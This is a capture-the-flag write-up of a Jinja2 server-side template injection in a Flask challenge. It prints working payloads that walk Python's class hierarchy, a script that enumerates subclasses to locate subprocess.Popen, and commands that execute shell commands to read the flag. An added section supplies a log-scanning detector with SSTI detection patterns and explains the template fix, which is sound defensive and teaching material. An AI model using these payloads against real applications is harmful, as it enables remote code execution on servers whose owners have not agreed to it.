Visit the page and view its source;
The hint says there is a parameter named search, with method GET;
Since the challenge mentions Flask, try a template injection (SSTI) vulnerability;
?search={{7*7}}
The result returns 49;
First, access the object's inheritance chain (the MRO);
{{ ''.__class__.__mro__ }}
Got the output; choose the third class;
{{ ''.__class__.__mro__[2].__subclasses__() }}
In the output, locate the file class, to use it for reading and writing;
{{ ''.__class__.__mro__[2].__subclasses__()[40]('/flag').read() }}
However, that doesn't work…
Try other approaches; catch_warnings probably won't work either;
Use subprocess.Popen to execute commands; first find which index this class sits at, with a script:
import requests
import re
import html
import time

index = 0
for i in range(0, 1000):
    try:
        # Render the i-th subclass so its repr appears in the <h3> of the response
        url = "http://1992ff4b-20b6-4eb5-9ba5-2c1148aac764.node3.buuoj.cn/?search={{''.__class__.__mro__[2].__subclasses__()[" + str(i) + "]}}"
        r = requests.get(url)
        res = re.findall(r"<h2>You searched for:<\/h2>\W+<h3>(.*)<\/h3>", r.text)
        time.sleep(0.1)
        # The page HTML-escapes the output, so unescape before matching
        res = html.unescape(res[0])
        print(str(i) + " | " + res)
        if "subprocess.Popen" in res:
            index = i
            break
    except (IndexError, requests.RequestException):
        # No <h3> match (index out of range on the target) or a network error: move on
        continue
print("index of subprocess.Popen: " + str(index))
The index comes out as 258;
?search={{''.__class__.__mro__[2].__subclasses__()[258]('ls',shell=True,stdout=-1).communicate()[0].strip()}}
?search={{''.__class__.__mro__[2].__subclasses__()[258]('ls /flasklight',shell=True,stdout=-1).communicate()[0].strip()}}
?search={{''.__class__.__mro__[2].__subclasses__()[258]('cat /flasklight/coomme_geeeett_youur_flek',shell=True,stdout=-1).communicate()[0].strip()}}
Got the flag
flag{6a877e0b-eb28-442d-b89c-dcc36bbae087}
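From the defender's side, the whole chain above leaves a distinctive trail in the access log: Jinja2 delimiters in the search parameter, the __class__/__mro__/__subclasses__ walk, and a burst of near-identical requests from one client while the index-enumeration script runs. The following detection script is an added example, not part of this writeup or of the challenge; it is standard-library Python only, and the access-log lines it scans are constructed here to mirror the requests made above (the IP addresses and timestamps are made up). It URL- and HTML-decodes each query value before matching, so encoded probes such as %7B%7B or &#123;&#123; are caught as well as plain {{.

```python
import html
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Markers of the Jinja2 SSTI chain used in the writeup: expression delimiters,
# the dunder attributes that lead from a literal to arbitrary classes, and the
# gadget class name the enumeration script searches for.
SSTI_PATTERNS = [
    (re.compile(r"\{\{.*?\}\}|\{%.*?%\}", re.S), "jinja2 delimiters"),
    (re.compile(r"__class__"), "dunder class access"),
    (re.compile(r"__mro__|__base__|__bases__"), "MRO / base-class walk"),
    (re.compile(r"__subclasses__"), "subclass enumeration"),
    (re.compile(r"__globals__|__builtins__|__import__"), "globals/builtins access"),
    (re.compile(r"subprocess\.Popen|os\.popen|os\.system"), "command gadget name"),
]

# Combined-format access log line: client, identd, user, [time], "METHOD target HTTP/x"
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"'
)

# Constructed sample log (hypothetical IPs/timestamps), mirroring the writeup's probes.
SAMPLE_LOG = [
    '10.0.0.5 - - [12/Mar/2021:10:15:32 +0000] "GET /?search=hello HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [12/Mar/2021:10:16:01 +0000] "GET /?search=%7B%7B7*7%7D%7D HTTP/1.1" 200 498 "-" "python-requests/2.25.1"',
    '10.0.0.9 - - [12/Mar/2021:10:16:02 +0000] "GET /?search=%7B%7B%27%27.__class__.__mro__%5B2%5D.__subclasses__()%5B40%5D%7D%7D HTTP/1.1" 200 600 "-" "python-requests/2.25.1"',
    '10.0.0.9 - - [12/Mar/2021:10:16:03 +0000] "GET /?search=%7B%7B%27%27.__class__.__mro__%5B2%5D.__subclasses__()%5B41%5D%7D%7D HTTP/1.1" 200 600 "-" "python-requests/2.25.1"',
    # Double-encoded probe: URL-encoded HTML entities for {{7*7}}
    '10.0.0.7 - - [12/Mar/2021:10:17:10 +0000] "GET /?search=%26%23123%3B%26%23123%3B7*7%26%23125%3B%26%23125%3B HTTP/1.1" 200 498 "-" "curl/7.68.0"',
]


def normalise(value, rounds=3):
    """Strip up to `rounds` layers of URL and HTML-entity encoding so that
    %7B%7B, &#123;&#123; and {{ all compare equal."""
    for _ in range(rounds):
        decoded = html.unescape(unquote(value))
        if decoded == value:
            break
        value = decoded
    return value


def scan_query(query):
    """Return sorted, de-duplicated (param, reason) hits for one raw query string."""
    hits = set()
    for param, values in parse_qs(query, keep_blank_values=True).items():
        for raw in values:
            value = normalise(raw)
            for pattern, reason in SSTI_PATTERNS:
                if pattern.search(value):
                    hits.add((param, reason))
    return sorted(hits)


def scan_access_log(lines):
    """Return (line_no, client, param, reason) for every suspicious request."""
    findings = []
    for line_no, line in enumerate(lines, 1):
        m = LOG_RE.match(line)
        if not m:
            continue
        query = urlsplit(m.group("target")).query
        for param, reason in scan_query(query):
            findings.append((line_no, m.group("client"), param, reason))
    return findings


def noisy_clients(findings, threshold=3):
    """Clients with at least `threshold` distinct flagged requests: the loop over
    __subclasses__() indices in the writeup's script produces exactly this burst."""
    lines_per_client = {}
    for line_no, client, _, _ in findings:
        lines_per_client.setdefault(client, set()).add(line_no)
    return sorted(c for c, s in lines_per_client.items() if len(s) >= threshold)


if __name__ == "__main__":
    found = scan_access_log(SAMPLE_LOG)
    for line_no, client, param, reason in found:
        print(f"line {line_no}: {client} param={param}: {reason}")
    print("burst clients:", noisy_clients(found))
```

The fix on the application side is independent of the detection: the injection exists only when the search value is concatenated into the template source before rendering (for example via render_template_string with string formatting); passing it as a template context variable instead keeps it as data, and Jinja2 then never evaluates it.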